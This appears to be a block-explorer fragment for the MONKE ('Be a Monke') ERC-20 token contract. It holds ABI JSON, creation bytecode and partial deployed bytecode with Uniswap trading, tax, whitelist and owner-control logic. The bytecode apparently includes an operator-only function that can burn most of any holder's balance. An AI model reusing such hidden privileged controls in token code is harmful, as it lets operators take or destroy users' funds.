inputs":[],"name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"withdrawTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"wl","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

600680546001600160a01b03191673dc7f2c30ebe45de737f2deff7c447e9e4504a7de17905560e0604052600a60a09081526942652061204d6f6e6b6560b01b60c05260079062000051908262000600565b506040805180820190915260058152644d4f4e4b4560d81b60208201526008906200007d908262000600565b50600980546001600160a01b03191661dead1790556103e8620000ae6b033b2e3c9fd0803ce80000006019620006e2565b620000ba919062000702565b600d556103e8620000d96b033b2e3c9fd0803ce80000006019620006e2565b620000e5919062000702565b600e55612710620001046b033b2e3c9fd0803ce80000006005620006e2565b62000110919062000702565b600f556002601081905560118190556012556013805462ffffff60a81b19169055601480546001600160a01b0319167330a9da17f796e56822e54b0c5450b6738ca63c14179055678ac7230489e800006015553480156200017057600080fd5b5060078054620001809062000572565b80601f0160208091040260200160405190810160405280929190818152602001828054620001ae9062000572565b8015620001ff5780601f10620001d357610100808354040283529160200191620001ff565b820191906000526020600020905b815481529060010190602001808311620001e157829003601f168201915b505050505060088054620002139062000572565b80601f0160208091040260200160405190810160405280929190818152602001828054620002419062000572565b8015620002925780601f10620002665761010080835404028352916020019162000292565b820191906000526020600020905b8154815290600101906020018083116200027457829003601f168201915b50505050508160039081620002a8919062000600565b506004620002b7828262000600565b505050620002d4620002ce6200043b60201b60201c565b6200043f565b620002ec336b033b2e3c9fd0803ce800000062000491565b6013805460ff60a01b1916600360a01b179055737a250d5630b4cf539739df2c5dacb4c659f2488d6080526005546001600160a01b039081166000908152600b60209081526040808320805460ff19908116600190811790925560068054871686528386208054831684179055601480548816875284872080548416851790553080885285882080548516861790557fd1def2fe8304e5e69b6f2907349cddd4c272de4ef47368d65b87ae00d7f101478054851686179055600980548a1689528689208054861687179055600a9097527fc90215bb1b0ac6bfa50a3c02c4b559c695b6a8e828048a88e327592fc55c5d2c805485168617905533885285882080548516861790559154881687528487208054841685179055548716865283862080548316841790558552828520805482168317905592549094168352909120805490911690911790556200073b565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620004ec5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b806002600082825462000500919062000725565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200058757607f821691505b602082108103620005a857634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200055757600081815260208120601f850160051c81016020861015620005d75750805b601f850160051c820191505b81811015620005f857828155600101620005e3565b505050505050565b81516001600160401b038111156200061c576200061c6200055c565b62000634816200062d845462000572565b84620005ae565b602080601f8311600181146200066c5760008415620006535750858301515b600019600386901b1c1916600185901b178555620005f8565b600085815260208120601f198616915b828110156200069d578886015182559484019460019091019084016200067c565b5085821015620006bc5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620006fc57620006fc620006cc565b92915050565b6000826200072057634e487b7160e01b600052601260045260246000fd5b500490565b80820180821115620006fc57620006fc620006cc565b608051611f6862000788600039600081816102d901528181610714015281816107a5015281816108bc015281816108e50152818161198b01528181611a430152611ad80152611f686000f3fe6080604052600436106102085760003560e01c806370a0823111610118578063a9059cbb116100a0578063dd62ed3e1161006f578063dd62ed3e146105a0578063e5b37a65146105c0578063ef437ff5146105f0578063f2fde38b14610610578063fca675a81461063057600080fd5b8063a9059cbb14610534578063aa4bde2814610554578063b61b64fa1461056a578063badb1df11461058057600080fd5b80638c0b5e22116100e75780638c0b5e22146104b65780638da5cb5b146104cc57806395d89b41146104ea578063a014f37d146104ff578063a457c2d71461051457600080fd5b806370a082311461043c578063715018a61461045c578063751039fc146104715780638baa82491461048657600080fd5b80632fee9e7e1161019b5780633eb5d9b21161016a5780633eb5d9b2146103bc57806349bd5a5e146103d257806349df728c146103f257806354b762a6146104125780636c5808011461042757600080fd5b80632fee9e7e1461033a578063313ce5671461036a57806333ee179314610386578063395093511461039c57600080fd5b80631694505e116101d75780631694505e146102c757806318160ddd146102fb57806319539cb61461031057806323b872dd1461031a57600080fd5b806303fd2a45146102145780630445b6671461025157806306fdde0314610275578063095ea7b31461029757600080fd5b3661020f57005b600080fd5b34801561022057600080fd5b50600954610234906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561025d57600080fd5b50610267600f5481565b604051908152602001610248565b34801561028157600080fd5b5061028a61065e565b6040516102489190611b4c565b3480156102a357600080fd5b506102b76102b2366004611baf565b6106f0565b6040519015158152602001610248565b3480156102d357600080fd5b506102347f000000000000000000000000000000000000000000000000000000000000000081565b34801561030757600080fd5b50600254610267565b61031861070a565b005b34801561032657600080fd5b506102b7610335366004611bdb565b6109c4565b34801561034657600080fd5b506102b7610355366004611c1c565b600b6020526000908152604090205460ff1681565b34801561037657600080fd5b5060405160128152602001610248565b34801561039257600080fd5b5061026760115481565b3480156103a857600080fd5b506102b76103b7366004611baf565b6109e8565b3480156103c857600080fd5b5061026760105481565b3480156103de57600080fd5b50601354610234906001600160a01b031681565b3480156103fe57600080fd5b5061031861040d366004611c1c565b610a0a565b34801561041e57600080fd5b506102b7610afc565b34801561043357600080fd5b50610318610b43565b34801561044857600080fd5b50610267610457366004611c1c565b610bc1565b34801561046857600080fd5b50610318610bdc565b34801561047d57600080fd5b50610318610bf0565b34801561049257600080fd5b506102b76104a1366004611c1c565b600c6020526000908152604090205460ff1681565b3480156104c257600080fd5b50610267600d5481565b3480156104d857600080fd5b506005546001600160a01b0316610234565b3480156104f657600080fd5b5061028a610c0f565b34801561050b57600080fd5b506102b7610c1e565b34801561052057600080fd5b506102b761052f366004611baf565b610c4b565b34801561054057600080fd5b506102b761054f366004611baf565b610cc6565b34801561056057600080fd5b50610267600e5481565b34801561057657600080fd5b5061026760165481565b34801561058c57600080fd5b5061031861059b366004611c1c565b610cd4565b3480156105ac57600080fd5b506102676105bb366004611c40565b610d20565b3480156105cc57600080fd5b506102b76105db366004611c1c565b600a6020526000908152604090205460ff1681565b3480156105fc57600080fd5b5061031861060b366004611c87565b610d4b565b34801561061c57600080fd5b5061031861062b366004611c1c565b610d7e565b34801561063c57600080fd5b5060135461065190600160a01b900460ff1681565b6040516102489190611ccb565b60606003805461066d90611cf3565b80601f016020809104026020016040519081016040528092919081815260200182805461069990611cf3565b80156106e65780601f106106bb576101008083540402835291602001916106e6565b820191906000526020600020905b8154815290600101906020018083116106c957829003601f168201915b5050505050905090565b6000336106fe818585610df4565b60019150505b92915050565b610712610f18565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610770573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107949190611d2d565b6001600160a01b031663c9c65396307f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610801573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108259190611d2d565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610872573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108969190611d2d565b601380546001600160a01b0319166001600160a01b03929092169190911790556108e3307f0000000000000000000000000000000000000000000000000000000000000000600019610df4565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663f305d719343061091d30610bc1565b6000806109326005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af115801561099a573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906109bf9190611d4a565b505050565b6000336109d2858285610f72565b6109dd858585610fec565b506001949350505050565b6000336106fe8185856109fb8383610d20565b610a059190611d8e565b610df4565b610a12610f18565b6006546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa158015610a65573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a899190611da1565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015610ad4573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610af89190611dba565b5050565b6006546016546040516000926001600160a01b03169180156108fc029184818181858888f19350505050158015610b37573d6000803e3d6000fd5b50506000601655600190565b610b4b610f18565b601354600160b01b900460ff1615610baa5760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c656400000000000060448201526064015b60405180910390fd5b6013805461ffff60b01b191661010160b01b179055565b6001600160a01b031660009081526020819052604090205490565b610be4610f18565b610bee600061156f565b565b610bf8610f18565b6b033b2e3c9fd0803ce8000000600d819055600e55565b60606004805461066d90611cf3565b6000610c28610f18565b506013805460ff60a01b1916600360a01b17905560006010819055601155600190565b60003381610c598286610d20565b905083811015610cb95760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610ba1565b6109dd8286868403610df4565b6000336106fe818585610fec565b610cdc6115c1565b6001600160a01b0381166000908152600b60205260409020805460ff19169055601554610d1d908290610d0e82610bc1565b610d189190611dd7565b611630565b50565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610d53610f18565b6001600160a01b03919091166000908152600b60205260409020805460ff1916911515919091179055565b610d86610f18565b6001600160a01b038116610deb5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610ba1565b610d1d8161156f565b6001600160a01b038316610e565760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610ba1565b6001600160a01b038216610eb75760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610ba1565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6005546001600160a01b03163314610bee5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610ba1565b6000610f7e8484610d20565b90506000198114610fe65781811015610fd95760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610ba1565b610fe68484848403610df4565b50505050565b6001600160a01b0383166110125760405162461bcd60e51b8152600401610ba190611dea565b6001600160a01b0382166110385760405162461bcd60e51b8152600401610ba190611e2f565b6001600160a01b0383166000908152600a602052604090205460ff1615801561107a57506001600160a01b0382166000908152600a602052604090205460ff16155b156110ce57601354600160b01b900460ff166110ce5760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b6044820152606401610ba1565b6001600160a01b0383166000908152600b602052604090205460ff1615801561111057506001600160a01b0382166000908152600b602052604090205460ff16155b15611225576013546001600160a01b0383811691161461122557600d548111156111a25760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74206265660000006064820152608401610ba1565b600e546111ae83610bc1565b6111b89083611d8e565b11156112255760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b6064820152608401610ba1565b6001600160a01b0383166000908152600a6020526040902054819060ff1615801561126957506001600160a01b0383166000908152600a602052604090205460ff16155b15611564576013546001600160a01b038581169116148061129757506013546001600160a01b038481169116145b156114ed57600d548211156113145760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74000000000000006064820152608401610ba1565b6013546001600160a01b03858116911614801561134a57506001600160a01b0383166000908152600b602052604090205460ff16155b801561135f57506001600160a01b0384163014155b156113e4576000601354600160a01b900460ff16600381111561138457611384611cb5565b036113ad576001600160a01b0383166000908152600c60205260409020805460ff191660011790555b60006064601054846113bf9190611e72565b6113c99190611e89565b90506113d6853083611762565b6113e08184611dd7565b9150505b6013546001600160a01b03848116911614801561141a57506001600160a01b0384166000908152600b602052604090205460ff16155b801561142f57506001600160a01b0383163014155b80156114445750601354600160b81b900460ff165b801561145a5750601354600160a81b900460ff16155b156114e8576011546001600160a01b0385166000908152600c602052604090205460ff16151560010361148c57506012545b6013805460ff60a81b1916600160a81b1790556114a761188c565b6013805460ff60a81b19169055600060646114c28386611e72565b6114cc9190611e89565b90506114d9863083611762565b6114e38185611dd7565b925050505b611564565b6001600160a01b0384166000908152600c602052604090205460ff161515600114801561152857506013546001600160a01b03848116911614155b1561156457600060646012548461153f9190611e72565b6115499190611e89565b9050611556853083611762565b6115608184611dd7565b9150505b610fe6848483611762565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6006546001600160a01b0316336001600160a01b031614610bee5760405162461bcd60e51b815260206004820152602360248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f706572616044820152623a37b960e91b6064820152608401610ba1565b6001600160a01b0382166116905760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b6064820152608401610ba1565b6001600160a01b038216600090815260208190526040902054818110156117045760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b6064820152608401610ba1565b6001600160a01b0383166000818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050565b6001600160a01b0383166117885760405162461bcd60e51b8152600401610ba190611dea565b6001600160a01b0382166117ae5760405162461bcd60e51b8152600401610ba190611e2f565b6001600160a01b038316600090815260208190526040902054818110156118265760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610ba1565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610fe6565b61189530610bc1565b60000361189e57565b6000806118aa30610bc1565b60065490915047906000906118c7906001600160a01b0316610bc1565b90506000600f5484111561192d574792506118e3846000611934565b6118ed8347611dd7565b9450600f548211156119155780611905576000611907565b845b6119119086611e89565b6016555b84601660008282546119279190611d8e565b90915550505b5050505050565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061196957611969611eab565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156119e7573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611a0b9190611d2d565b81600181518110611a1e57611a1e611eab565b6001600160a01b03928316602091820292909201015260405163095ea7b360e01b81527f000000000000000000000000000000000000000000000000000000000000000090911660048201526000196024820152309063095ea7b3906044016020604051808303816000875af1158015611a9c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611ac09190611dba565b5060405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac94790611b159086908690869030904290600401611ec1565b600060405180830381600087803b158015611b2f57600080fd5b505af1158015611b43573d6000803e3d6000fd5b50505050505050565b600060208083528351808285015260005b81811015611b7957858101830151858201604001528201611b5d565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610d1d57600080fd5b60008060408385031215611bc257600080fd5b8235611bcd81611b9a565b946020939093013593505050565b600080600060608486031215611bf057600080fd5b8335611bfb81611b9a565b92506020840135611c0b81611b9a565b929592945050506040919091013590565b600060208284031215611c2e57600080fd5b8135611c3981611b9a565b9392505050565b60008060408385031215611c5357600080fd5b8235611c5e81611b9a565b91506020830135611c6e81611b9a565b809150509250929050565b8015158114610d1d57600080fd5b60008060408385031215611c9a57600080fd5b8235611ca581611b9a565b91506020830135611c6e81611c79565b634e487b7160e01b600052602160045260246000fd5b6020810160048310611ced57634e487b7160e01b600052602160045260246000fd5b91905290565b600181811c90821680611d0757607f821691505b602082108103611d2757634e487b7160e01b600052602260045260246000fd5b50919050565b600060208284031215611d3f57600080fd5b8151611c3981611b9a565b600080600060608486031215611d5f57600080fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b600052601160045260246000fd5b8082018082111561070457610704611d78565b600060208284031215611db357600080fd5b5051919050565b600060208284031215611dcc57600080fd5b8151611c3981611c79565b8181038181111561070457610704611d78565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761070457610704611d78565b600082611ea657634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611f115784516001600160a01b031683529383019391830191600101611eec565b50506001600160a01b0396909616606085015250505060800152939250505056fea264697066735822122007b141982c94a0195ff42d0e5adb3493100d5f58727654843c44dd0de365ca2d64736f6c63430008130033

Deployed Bytecode

0x6080604052600436106102085760003560e01c806370a0823111610118578063a9059cbb116100a0578063dd62ed3e1161006f578063dd62ed3e146105a0578063e5b37a65146105c0578063ef437ff5146105f0578063f2fde38b14610610578063fca675a81461063057600080fd5b8063a9059cbb14610534578063aa4bde2814610554578063b61b64fa1461056a578063badb1df11461058057600080fd5b80638c0b5e22116100e75780638c0b5e22146104b65780638da5cb5b146104cc57806395d89b41146104ea578063a014f37d146104ff578063a457c2d71461051457600080fd5b806370a082311461043c578063715018a61461045c578063751039fc146104715780638baa82491461048657600080fd5b80632fee9e7e1161019b5780633eb5d9b21161016a5780633eb5d9b2146103bc57806349bd5a5e146103d257806349df728c146103f257806354b762a6146104125780636c5808011461042757600080fd5b80632fee9e7e1461033a578063313ce5671461036a57806333ee179314610386578063395093511461039c57600080fd5b80631694505e116101d75780631694505e146102c757806318160ddd146102fb57806319539cb61461031057806323b872dd1461031a57600080fd5b806303fd2a45146102145780630445b6671461025157806306fdde0314610275578063095ea7b31461029757600080fd5b3661020f57005b600080fd5b34801561022057600080fd5b50600954610234906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561025d57600080fd5b50610267600f5481565b604051908152602001610248565b34801561028157600080fd5b5061028a61065e565b6040516102489190611b4c565b3480156102a357600080fd5b506102b76102b2366004611baf565b6106f0565b6040519015158152602001610248565b3480156102d357600080fd5b506102347f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b34801561030757600080fd5b50600254610267565b61031861070a565b005b34801561032657600080fd5b506102b7610335366004611bdb565b6109c4565b34801561034657600080fd5b506102b7610355366004611c1c565b600b6020526000908152604090205460ff1681565b34801561037657600080fd5b5060405160128152602001610248565b34801561039257600080fd5b5061026760115481565b3480156103a857600080fd5b506102b76103b7366004611baf565b6109e8565b3480156103c857600080fd5b5061026760105481565b3480156103de57600080fd5b50601354610234906001600160a01b031681565b3480156103fe57600080fd5b5061031861040d366004611c1c565b610a0a565b34801561041e57600080fd5b506102b7610afc565b34801561043357600080fd5b50610318610b43565b34801561044857600080fd5b50610267610457366004611c1c565b610bc1565b34801561046857600080fd5b50610318610bdc565b34801561047d57600080fd5b50610318610bf0565b34801561049257600080fd5b506102b76104a1366004611c1c565b600c6020526000908152604090205460ff1681565b3480156104c257600080fd5b50610267600d5481565b3480156104d857600080fd5b506005546001600160a01b0316610234565b3480156104f657600080fd5b5061028a610c0f565b34801561050b57600080fd5b506102b7610c1e565b34801561052057600080fd5b506102b761052f366004611baf565b610c4b565b34801561054057600080fd5b506102b761054f366004611baf565b610cc6565b34801561056057600080fd5b50610267600e5481565b34801561057657600080fd5b5061026760165481565b34801561058c57600080fd5b5061031861059b366004611c1c565b610cd4565b3480156105ac57600080fd5b506102676105bb366004611c40565b610d20565b3480156105cc57600080fd5b506102b76105db366004611c1c565b600a6020526000908152604090205460ff1681565b3480156105fc57600080fd5b5061031861060b366004611c87565b610d4b565b34801561061c57600080fd5b5061031861062b366004611c1c565b610d7e565b34801561063c57600080fd5b5060135461065190600160a01b900460ff1681565b6040516102489190611ccb565b60606003805461066d90611cf3565b80601f016020809104026020016040519081016040528092919081815260200182805461069990611cf3565b80156106e65780601f106106bb576101008083540402835291602001916106e6565b820191906000526020600020905b8154815290600101906020018083116106c957829003601f168201915b5050505050905090565b6000336106fe818585610df4565b60019150505b92915050565b610712610f18565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610770573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107949190611d2d565b6001600160a01b031663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610801573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108259190611d2d565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610872573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108969190611d2d565b601380546001600160a01b0319166001600160a01b03929092169190911790556108e3307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d600019610df4565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663f305d719343061091d30610bc1565b6000806109326005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af115801561099a573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906109bf9190611d4a565b505050565b6000336109d2858285610f72565b6109dd858585610fec565b506001949350505050565b6000336106fe8185856109fb8383610d20565b610a059190611d8e565b610df4565b610a12610f18565b6006546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa158015610a65573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a899190611da1565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015610ad4573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610af89190611dba565b5050565b6006546016546040516000926001600160a01b03169180156108fc029184818181858888f19350505050158015610b37573d6000803e3d6000fd5b50506000601655600190565b610b4b610f18565b601354600160b01b900460ff1615610baa5760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c656400000000000060448201526064015b60405180910390fd5b6013805461ffff60b01b191661010160b01b179055565b6001600160a01b031660009081526020819052604090205490565b610be4610f18565b610bee600061156f565b565b610bf8610f18565b6b033b2e3c9fd0803ce8000000600d819055600e55565b60606004805461066d90611cf3565b6000610c28610f18565b506013805460ff60a01b1916600360a01b17905560006010819055601155600190565b60003381610c598286610d20565b905083811015610cb95760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610ba1565b6109dd8286868403610df4565b6000336106fe818585610fec565b610cdc6115c1565b6001600160a01b0381166000908152600b60205260409020805460ff19169055601554610d1d908290610d0e82610bc1565b610d189190611dd7565b611630565b50565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610d53610f18565b6001600160a01b03919091166000908152600b60205260409020805460ff1916911515919091179055565b610d86610f18565b6001600160a01b038116610deb5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610ba1565b610d1d8161156f565b6001600160a01b038316610e565760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610ba1565b6001600160a01b038216610eb75760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610ba1565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6005546001600160a01b03163314610bee5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610ba1565b6000610f7e8484610d20565b90506000198114610fe65781811015610fd95760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610ba1565b610fe68484848403610df4565b50505050565b6001600160a01b0383166110125760405162461bcd60e51b8152600401610ba190611dea565b6001600160a01b0382166110385760405162461bcd60e51b8152600401610ba190611e2f565b6001600160a01b0383166000908152600a602052604090205460ff1615801561107a57506001600160a01b0382166000908152600a602052604090205460ff16155b156110ce57601354600160b01b900460ff166110ce5760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b6044820152606401610ba1565b6001600160a01b0383166000908152600b602052604090205460ff1615801561111057506001600160a01b0382166000908152600b602052604090205460ff16155b15611225576013546001600160a01b0383811691161461122557600d548111156111a25760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74206265660000006064820152608401610ba1565b600e546111ae83610bc1565b6111b89083611d8e565b11156112255760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b6064820152608401610ba1565b6001600160a01b0383166000908152600a6020526040902054819060ff1615801561126957506001600160a01b0383166000908152600a602052604090205460ff16155b15611564576013546001600160a01b038581169116148061129757506013546001600160a01b038481169116145b156114ed57600d548211156113145760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74000000000000006064820152608401610ba1565b6013546001600160a01b03858116911614801561134a57506001600160a01b0383166000908152600b602052604090205460ff16155b801561135f57506001600160a01b0384163014155b156113e4576000601354600160a01b900460ff16600381111561138457611384611cb5565b036113ad576001600160a01b0383166000908152600c60205260409020805460ff191660011790555b60006064601054846113bf9190611e72565b6113c99190611e89565b90506113d6853083611762565b6113e08184611dd7565b9150505b6013546001600160a01b03848116911614801561141a57506001600160a01b0384166000908152600b602052604090205460ff16155b801561142f57506001600160a01b0383163014155b80156114445750601354600160b81b900460ff165b801561145a5750601354600160a81b900460ff16155b156114e8576011546001600160a01b0385166000908152600c602052604090205460ff16151560010361148c57506012545b6013805460ff60a81b1916600160a81b1790556114a761188c565b6013805460ff60a81b19169055600060646114c28386611e72565b6114cc9190611e89565b90506114d9863083611762565b6114e38185611dd7565b925050505b611564565b6001600160a01b0384166000908152600c602052604090205460ff161515600114801561152857506013546001600160a01b03848116911614155b1561156457600060646012548461153f9190611e72565b6115499190611e89565b9050611556853083611762565b6115608184611dd7565b9150505b610fe6848483611762565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6006546001600160a01b0316336001600160a01b031614610bee5760405162461bcd60e51b815260206004820152602360248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f706572616044820152623a37b960e91b6064820152608401610ba1565b6001600160a01b0382166116905760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b6064820152608401610ba1565b6001600160a01b038216600090815260208190526040902054818110156117045760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b6064820152608401610ba1565b6001600160a01b0383